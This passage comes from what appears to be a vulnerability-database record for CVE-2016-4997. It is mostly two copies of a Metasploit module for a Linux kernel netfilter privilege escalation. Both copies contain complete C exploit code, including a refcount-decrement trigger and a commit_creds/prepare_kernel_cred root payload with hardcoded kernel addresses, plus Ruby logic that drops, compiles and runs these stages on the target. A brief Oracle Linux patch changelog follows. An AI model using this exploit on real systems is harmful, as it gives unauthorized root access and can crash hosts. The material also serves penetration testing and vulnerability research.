works against Ubuntu 16.04 (not 16.04.1) with kernel\n 4.4.0-21-generic.\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n 2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n We write the ascii files and compile on target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die <mike@stcyrsecurity.com>', # Module\n 'vnik' # Discovery\n ],\n 'DisclosureDate' => 'Jun 03 2016',\n 'Platform' => [ 'linux'],\n 'Arch' => [ ARCH_X86 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [ 'Ubuntu', { } ]\n #[ 'Fedora', { } ]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n [ 'EDB', '40049'],\n [ 'CVE', '2016-4997'],\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\n ]\n ))\n register_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ], self.class)\n end\n\n def check\n def iptables_loaded?()\n # user@ubuntu:~$ cat /proc/modules | grep ip_tables\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\n vprint_status('Checking if ip_tables is loaded in kernel')\n if target.name == \"Ubuntu\"\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\n if iptables.include?('ip_tables')\n vprint_good('ip_tables.ko is loaded')\n else\n print_error('ip_tables.ko is not loaded. 
root needs to run iptables -L or similar command')\n end\n return iptables.include?('ip_tables')\n elsif target.name == \"Fedora\"\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\n if iptables.include?('iptable_raw')\n vprint_good('iptable_raw is loaded')\n else\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('iptable_raw')\n else\n return false\n end\n end\n\n def shemsham_installed?()\n # we want this to be false.\n vprint_status('Checking if shem or sham are installed')\n shemsham = cmd_exec('cat /proc/cpuinfo')\n if shemsham.include?('shem')\n print_error('shem installed, system not vulnerable.')\n elsif shemsham.include?('sham')\n print_error('sham installed, system not vulnerable.')\n else\n vprint_good('shem and sham not present.')\n end\n return (shemsham.include?('shem') or shemsham.include?('sham'))\n end\n\n if iptables_loaded?() and not shemsham_installed?()\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\n if target.name == \"Ubuntu\"\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\n if lib.include?('install')\n vprint_good('libc6-dev-i386 is installed')\n else\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\n end\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\n if multilib.include?('install')\n vprint_good('gcc-multilib is installed')\n else\n print_error('gcc-multilib is not installed. Compiling will fail.')\n end\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. 
Compiling will fail.')\n end\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\n elsif target.name == \"Fedora\"\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\n if lib.include?('glibc')\n vprint_good('glibc-devel.i686 is installed')\n else\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\n end\n if lib.include?('libgcc')\n vprint_good('libgcc.i686 is installed')\n else\n print_error('libgcc.i686 is not installed. Compiling will fail.')\n end\n multilib = false #not implemented\n gcc = false #not implemented\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\n else\n return false\n end\n end\n\n compile = false\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!')\n end\n\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_file = rand_text_alpha(8)\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\n\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\n # removed #include <netinet/in.h> per busterb comment in PR 7326\n decr = %q{\n #define _GNU_SOURCE\n #include <stdio.h>\n #include <stdlib.h>\n #include <string.h>\n #include <unistd.h>\n #include <sched.h>\n #include <netinet/in.h>\n #include <linux/sched.h>\n #include <errno.h>\n #include <sys/types.h>\n #include <sys/socket.h>\n #include <sys/ptrace.h>\n #include <net/if.h>\n #include <linux/netfilter_ipv4/ip_tables.h>\n #include <linux/netlink.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n\n #define MALLOC_SIZE 66*1024\n\n int decr(void *p) {\n int sock, optlen;\n int ret;\n void *data;\n struct ipt_replace *repl;\n struct ipt_entry *entry;\n struct xt_entry_match *ematch;\n struct xt_standard_target *target;\n unsigned i;\n\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\n\n if (sock == -1) {\n perror(\"socket\");\n return -1;\n }\n\n data = malloc(MALLOC_SIZE);\n\n if (data == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n memset(data, 0, MALLOC_SIZE);\n\n repl = (struct ipt_replace *) data;\n repl->num_entries = 1;\n repl->num_counters = 1;\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\n repl->valid_hooks = 0;\n\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\n entry->target_offset = 74; // overwrite target_offset\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\n\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\n\n strcpy(ematch->u.user.name, \"icmp\");\n void 
*kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\n *me = 0xffffffff821de10d; // magic number!\n\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\n *match = (uint32_t)kmatch;\n\n ematch->u.match_size = (short)0xffff;\n\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\n uint32_t *t = (uint32_t *)target;\n *t = (uint32_t)kmatch;\n\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\n\n for (i = 0; i < 0xffffff/2+1; i++) {\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\n }\n\n close(sock);\n free(data);\n printf(\"[+] Done! Now run ./pwn\\n\");\n\n return 0;\n }\n\n int main(void) {\n void *stack;\n int ret;\n\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\n\n ret = unshare(CLONE_NEWUSER);\n\n if (ret == -1) {\n perror(\"unshare\");\n return -1;\n }\n\n stack = (void *) malloc(65536);\n\n if (stack == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\n\n sleep(1);\n\n return 0;\n }\n }\n\n # direct copy of code from exploit-db\n pwn = %q{\n #include <stdio.h>\n #include <string.h>\n #include <errno.h>\n #include <unistd.h>\n #include <stdint.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n #include <assert.h>\n\n #define MMAP_ADDR 0xff814e3000\n #define MMAP_OFFSET 0xb0\n\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\n\n void __attribute__((regparm(3))) privesc() {\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\n }\n\n int main() {\n void *payload = 
(void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\n assert(payload == (void *)MMAP_ADDR);\n\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\n\n memset(shellcode, 0, 0x300000);\n\n void *ret = memcpy(shellcode, &privesc, 0x300);\n assert(ret == shellcode);\n\n printf(\"[+] Escalating privs...\\n\");\n\n int fd = open(\"/dev/ptmx\", O_RDWR);\n close(fd);\n\n assert(!getuid());\n\n printf(\"[+] We've got root!\");\n\n return execl(\"/bin/bash\", \"-sh\", NULL);\n }\n }\n\n # the original code printed a line. However, this is hard to detect due to threading.\n # so instead we can write a file in /tmp to catch.\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\n\n # patch in to run our payload\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\n \"execl(\\\"#{payload_path}\\\", NULL);\")\n\n def pwn(payload_path, pwn_file, pwn, compile)\n # lets write our payload since everythings set for priv esc\n vprint_status(\"Writing payload to #{payload_path}\")\n write_file(payload_path, generate_payload_exe)\n cmd_exec(\"chmod 555 #{payload_path}\")\n register_file_for_cleanup(payload_path)\n\n # now lets drop part 2, and finish up.\n rm_f pwn_file\n if compile\n print_status \"Writing pwn executable to #{pwn_file}.c\"\n rm_f \"#{pwn_file}.c\"\n write_file(\"#{pwn_file}.c\", pwn)\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\n register_file_for_cleanup(\"#{pwn_file}.c\")\n else\n print_status \"Writing pwn executable to #{pwn_file}\"\n write_file(pwn_file, pwn)\n end\n register_file_for_cleanup(pwn_file)\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\n end\n\n if not compile # we need to override with our pre-created binary\n # pwn file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\n fd = ::File.open( path, \"rb\")\n pwn = fd.read(fd.stat.size)\n fd.close\n # desc file\n path = 
::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\n fd = ::File.open( path, \"rb\")\n decr = fd.read(fd.stat.size)\n fd.close\n\n # overwrite the hardcoded variable names in the compiled versions\n env_ready_file = '/tmp/okDjTFSS'\n payload_path = '/tmp/2016_4997_payload'\n end\n\n # check for shortcut\n if datastore['REEXPLOIT']\n pwn(payload_path, pwn_file, pwn, compile)\n else\n rm_f desc_file\n if compile\n print_status \"Writing desc executable to #{desc_file}.c\"\n rm_f \"#{desc_file}.c\"\n write_file(\"#{desc_file}.c\", decr)\n register_file_for_cleanup(\"#{desc_file}.c\")\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\n else\n write_file(desc_file, decr)\n end\n rm_f env_ready_file\n register_file_for_cleanup(env_ready_file)\n #register_file_for_cleanup(desc_file)\n if not file_exist?(desc_file)\n vprint_error(\"gcc failure output: #{output}\")\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\n end\n if target.name == \"Ubuntu\"\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\n elsif target.name == \"Fedora\"\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. 
Watching for #{env_ready_file} to be created.\"\n end\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\n sec_waited = 0\n\n until sec_waited > datastore['MAXWAIT'] do\n Rex.sleep(1)\n if sec_waited % 10 == 0\n vprint_status(\"Waited #{sec_waited}s so far\")\n end\n\n if file_exist?(env_ready_file)\n print_good(\"desc finished, env ready.\")\n pwn(payload_path, pwn_file, pwn, compile)\n return\n end\n sec_waited +=1\n end\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/netfilter_priv_esc.rb"}, {"lastseen": "2020-10-12T19:34:28", "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1\\. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2\\. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP. 
We write the ascii files and compile on target instead of locally since metasm bombs for not having cdefs.h (even if locally installed)\n", "published": "2016-11-18T18:52:09", "type": "metasploit", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC_IPV4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable. 
This exploit does not bypass SMEP/SMAP.\n\n We write the ascii files and compile on target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die <mike@stcyrsecurity.com>', # Module\n 'vnik', # Exploit\n 'Jesse Hertz', # Discovery\n 'Tim Newsham' # Discovery\n ],\n 'DisclosureDate' => '2016-06-03',\n 'Platform' => [ 'linux'],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [ 'Ubuntu', { } ]\n #[ 'Fedora', { } ]\n ],\n 'References' =>\n [\n ['EDB', '40049'],\n ['CVE', '2016-4997'],\n ['CVE', '2016-4998'],\n ['URL', 'https://www.openwall.com/lists/oss-security/2016/06/24/5'],\n ['URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'],\n ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91']\n ],\n 'Notes' =>\n {\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ],\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n def iptables_loaded?()\n # user@ubuntu:~$ grep ip_tables /proc/modules\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\n vprint_status('Checking if ip_tables is loaded in kernel')\n if target.name == \"Ubuntu\"\n iptables = 
read_file('/proc/modules').to_s\n if iptables.include?('ip_tables')\n vprint_good('ip_tables.ko is loaded')\n else\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('ip_tables')\n elsif target.name == \"Fedora\"\n iptables = read_file('/proc/modules').to_s\n if iptables.include?('iptable_raw')\n vprint_good('iptable_raw is loaded')\n else\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('iptable_raw')\n else\n return false\n end\n end\n\n return CheckCode::Safe unless iptables_loaded?\n\n if smep_enabled?\n print_error('SMEP enabled, system not vulnerable.')\n return CheckCode::Safe\n end\n vprint_good('SMEP is not enabled')\n\n if smap_enabled?\n print_error('SMAP enabled, system not vulnerable.')\n return CheckCode::Safe\n end\n vprint_good('SMAP is not enabled')\n\n unless userns_enabled?\n vprint_error('Unprivileged user namespaces are not permitted')\n return CheckCode::Safe\n end\n vprint_good('Unprivileged user namespaces are permitted')\n\n CheckCode::Appears\n end\n\n def exploit\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\n if target.name == \"Ubuntu\"\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\n if lib.include?('install')\n vprint_good('libc6-dev-i386 is installed')\n else\n print_error('libc6-dev-i386 is not installed. 
Compiling will fail.')\n end\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\n if multilib.include?('install')\n vprint_good('gcc-multilib is installed')\n else\n print_error('gcc-multilib is not installed. Compiling will fail.')\n end\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. Compiling will fail.')\n end\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\n elsif target.name == \"Fedora\"\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\n if lib.include?('glibc')\n vprint_good('glibc-devel.i686 is installed')\n else\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\n end\n if lib.include?('libgcc')\n vprint_good('libgcc.i686 is installed')\n else\n print_error('libgcc.i686 is not installed. Compiling will fail.')\n end\n multilib = false #not implemented\n gcc = false #not implemented\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\n else\n return false\n end\n end\n\n compile = false\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_file = rand_text_alpha(8)\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\n\n # direct copy of code from exploit-db, except removed the check for smep/smap and ip_tables.ko since we can do that in the check area here\n # removed #include <netinet/in.h> per busterb comment in PR 7326\n decr = %q{\n #define _GNU_SOURCE\n #include <stdio.h>\n #include 
<stdlib.h>\n #include <string.h>\n #include <unistd.h>\n #include <sched.h>\n #include <netinet/in.h>\n #include <linux/sched.h>\n #include <errno.h>\n #include <sys/types.h>\n #include <sys/socket.h>\n #include <sys/ptrace.h>\n #include <net/if.h>\n #include <linux/netfilter_ipv4/ip_tables.h>\n #include <linux/netlink.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n\n #define MALLOC_SIZE 66*1024\n\n int decr(void *p) {\n int sock, optlen;\n int ret;\n void *data;\n struct ipt_replace *repl;\n struct ipt_entry *entry;\n struct xt_entry_match *ematch;\n struct xt_standard_target *target;\n unsigned i;\n\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\n\n if (sock == -1) {\n perror(\"socket\");\n return -1;\n }\n\n data = malloc(MALLOC_SIZE);\n\n if (data == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n memset(data, 0, MALLOC_SIZE);\n\n repl = (struct ipt_replace *) data;\n repl->num_entries = 1;\n repl->num_counters = 1;\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\n repl->valid_hooks = 0;\n\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\n entry->target_offset = 74; // overwrite target_offset\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\n\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\n\n strcpy(ematch->u.user.name, \"icmp\");\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\n *me = 0xffffffff821de10d; // magic number!\n\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\n *match = (uint32_t)kmatch;\n\n ematch->u.match_size = (short)0xffff;\n\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\n uint32_t *t = (uint32_t *)target;\n *t = (uint32_t)kmatch;\n\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\n printf(\"[!] 
Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\n\n for (i = 0; i < 0xffffff/2+1; i++) {\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\n }\n\n close(sock);\n free(data);\n printf(\"[+] Done! Now run ./pwn\\n\");\n\n return 0;\n }\n\n int main(void) {\n void *stack;\n int ret;\n\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\n\n ret = unshare(CLONE_NEWUSER);\n\n if (ret == -1) {\n perror(\"unshare\");\n return -1;\n }\n\n stack = (void *) malloc(65536);\n\n if (stack == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\n\n sleep(1);\n\n return 0;\n }\n }\n\n # direct copy of code from exploit-db\n pwn = %q{\n #include <stdio.h>\n #include <string.h>\n #include <errno.h>\n #include <unistd.h>\n #include <stdint.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n #include <assert.h>\n\n #define MMAP_ADDR 0xff814e3000\n #define MMAP_OFFSET 0xb0\n\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\n\n void __attribute__((regparm(3))) privesc() {\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\n }\n\n int main() {\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\n assert(payload == (void *)MMAP_ADDR);\n\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\n\n memset(shellcode, 0, 0x300000);\n\n void *ret = memcpy(shellcode, &privesc, 0x300);\n assert(ret == shellcode);\n\n printf(\"[+] Escalating privs...\\n\");\n\n int fd = open(\"/dev/ptmx\", O_RDWR);\n close(fd);\n\n assert(!getuid());\n\n printf(\"[+] We've got root!\");\n\n return execl(\"/bin/bash\", \"-sh\", NULL);\n }\n }\n\n # the original code printed a line. 
However, this is hard to detect due to threading.\n # so instead we can write a file in /tmp to catch.\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\n\n # patch in to run our payload\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\n \"execl(\\\"#{payload_path}\\\", NULL);\")\n\n def pwn(payload_path, pwn_file, pwn, compile)\n # lets write our payload since everythings set for priv esc\n vprint_status(\"Writing payload to #{payload_path}\")\n write_file(payload_path, generate_payload_exe)\n cmd_exec(\"chmod 555 #{payload_path}\")\n register_file_for_cleanup(payload_path)\n\n # now lets drop part 2, and finish up.\n rm_f pwn_file\n if compile\n print_status \"Writing pwn executable to #{pwn_file}.c\"\n rm_f \"#{pwn_file}.c\"\n write_file(\"#{pwn_file}.c\", pwn)\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\n register_file_for_cleanup(\"#{pwn_file}.c\")\n else\n print_status \"Writing pwn executable to #{pwn_file}\"\n write_file(pwn_file, pwn)\n end\n register_file_for_cleanup(pwn_file)\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\n end\n\n if not compile # we need to override with our pre-created binary\n # pwn file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\n fd = ::File.open( path, \"rb\")\n pwn = fd.read(fd.stat.size)\n fd.close\n # desc file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\n fd = ::File.open( path, \"rb\")\n decr = fd.read(fd.stat.size)\n fd.close\n\n # overwrite the hardcoded variable names in the compiled versions\n env_ready_file = '/tmp/okDjTFSS'\n payload_path = '/tmp/2016_4997_payload'\n end\n\n # check for shortcut\n if datastore['REEXPLOIT']\n pwn(payload_path, pwn_file, pwn, compile)\n else\n rm_f desc_file\n if compile\n print_status \"Writing desc executable to #{desc_file}.c\"\n rm_f 
\"#{desc_file}.c\"\n write_file(\"#{desc_file}.c\", decr)\n register_file_for_cleanup(\"#{desc_file}.c\")\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\n else\n write_file(desc_file, decr)\n end\n rm_f env_ready_file\n register_file_for_cleanup(env_ready_file)\n #register_file_for_cleanup(desc_file)\n if not file_exist?(desc_file)\n vprint_error(\"gcc failure output: #{output}\")\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\n end\n if target.name == \"Ubuntu\"\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\n elsif target.name == \"Fedora\"\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\n end\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\n sec_waited = 0\n\n until sec_waited > datastore['MAXWAIT'] do\n Rex.sleep(1)\n if sec_waited % 10 == 0\n vprint_status(\"Waited #{sec_waited}s so far\")\n end\n\n if file_exist?(env_ready_file)\n print_good(\"desc finished, env ready.\")\n pwn(payload_path, pwn_file, pwn, compile)\n return\n end\n sec_waited +=1\n end\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "kernel-uek\n[4.1.12-61.1.10]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n[4.1.12-61.1.9]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: 24616917] \n- NVMe: Fix obtaining command result (Keith Busch) [Orabug: 
